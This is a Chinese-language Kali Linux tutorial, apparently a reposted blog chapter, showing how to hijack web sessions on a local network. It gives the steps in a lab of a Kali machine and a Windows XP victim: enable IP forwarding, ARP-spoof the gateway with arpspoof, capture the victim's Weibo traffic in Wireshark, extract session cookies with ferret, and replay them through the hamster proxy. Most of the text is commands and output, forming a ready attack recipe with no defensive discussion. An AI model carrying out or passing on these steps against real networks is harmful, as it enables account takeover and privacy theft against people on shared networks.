1. 程式人生 > >kali攻防第3章 內網稱霸之Cookie擷取

kali攻防第3章 內網稱霸之Cookie擷取

內網稱霸之Cookie擷取

準備工具

1、一臺KALI_LINUX系統

2、一臺被攻擊的windows系統

網路環境

Kali系統IP  10.10.10.131

Windows xp IP 10.10.10.129

使用的工具

arpspoof   -->欺騙工具 

wireshark -->抓包工具  

開始執行步驟

1、[email protected]:~# echo "1" > /proc/sys/net/ipv4/ip_forward

2、arpspoof -i eth0 -t 10.10.10.2 10.10.10.129

3、使用wireshark進行抓包

 

4、受害者10.10.10.129

開啟微博

 

5、停止抓包工具並儲存抓包資料為pcap格式,儲存名字為cookie

 

6、使用 ferret工具

如果沒有這個工具請使用命令

ferret沒有64位的

可以安裝32位的

1)新增對32位的支援

dpkg --add-architecture i386

2)更新

apt-get clean && apt-get update && apt-get upgrade -y && apt-get dist-upgrade -y

3)安裝ferret

sudo aptitude install ferret-sidejack:i386

4)ferrer -r cookie.pacp

7、生成hamster.txt檔案,進行架設代理伺服器

[email protected]:~# hamster 

--- HAMPSTER 2.0 side-jacking tool ---

Set browser to use proxy http://127.0.0.1:1234

DEBUG: set_ports_option(1234)

DEBUG: mg_open_listening_port(1234)

Proxy: listening on 127.0.0.1:1234

begining thread

8、開啟10.10.10.131系統中的遊覽器,設定代理服務地址和埠並關閉arp欺騙

 

9、分析hamster資訊一條一條進行